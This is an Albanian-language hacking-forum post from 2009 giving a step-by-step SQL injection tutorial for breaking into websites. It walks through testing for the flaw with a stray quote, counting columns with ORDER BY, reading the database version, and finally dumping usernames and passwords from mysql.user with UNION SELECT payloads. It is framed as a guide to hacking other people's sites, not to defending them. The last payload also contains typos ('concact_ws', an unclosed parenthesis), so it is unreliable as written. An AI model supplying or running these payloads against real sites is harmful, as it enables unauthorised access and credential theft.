Sql Injection nga rigonn

    Share
    avatar
    loti the hacker
    WebMaster
    WebMaster

    Postimet : 522
    Pikët : 1499
    Thanks : 7
    Location : TeToVa
    Join date : 07/05/2009

    (N) Sql Injection nga rigonn

    Mesazh nga loti the hacker prej Sat May 16, 2009 10:15 am

    Përshendetje bashkforumist të dashur vendosa të bëj një tuto rreth '' sql injection ''.
    Së pari webi që doni të hakoni duhet të jete vulnerable për të shikuar a është ueb-faqja vulnerable ja shtojm stringun ' , neqoftse na del nje mezash i ngjajshëm kështu

    Cito:
    1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''499''' at line 1
    SELECT * FROM acdsite.news WHERE id = '499''

    ueb-faqja është vulnerable dhe mund ta hakoni.
    Tani duhet me gjet sa columna ka ueb-faqja veproni kështu order by 4/* ose me nje numer tjeter , provoni prej numrit te madh deri ne te voglin.Pra tani po e marr shembull që web-faqja i ka 4 columna , pastaj veproni kështu union select 1,2,3,4,5/* ta provojm nëqoftse mundet kështu.
    Tani duhet të ja gjejme verzionin e msyql , veprojm kështu union select 1,2,@@version,4,5/* nëqoftse ka web-faqja4 kolumna si mora shembul më parë.
    Tani na ka mbet gjeja e fundit për të gjetur username dhe password të ueb-faqës , veproni kështu.
    union select 1,2,concact_ws(0x3a,user,password,4,5 from mysql.user/*

    Autori:rigonn
    Kështu veprojm vetem nësë web-faqja i ka 4 kolumns , pastaj tjeter nëqoftse ka ndryshe columns ju e ndrroni.

      Ora është Mon Jun 26, 2017 6:04 pm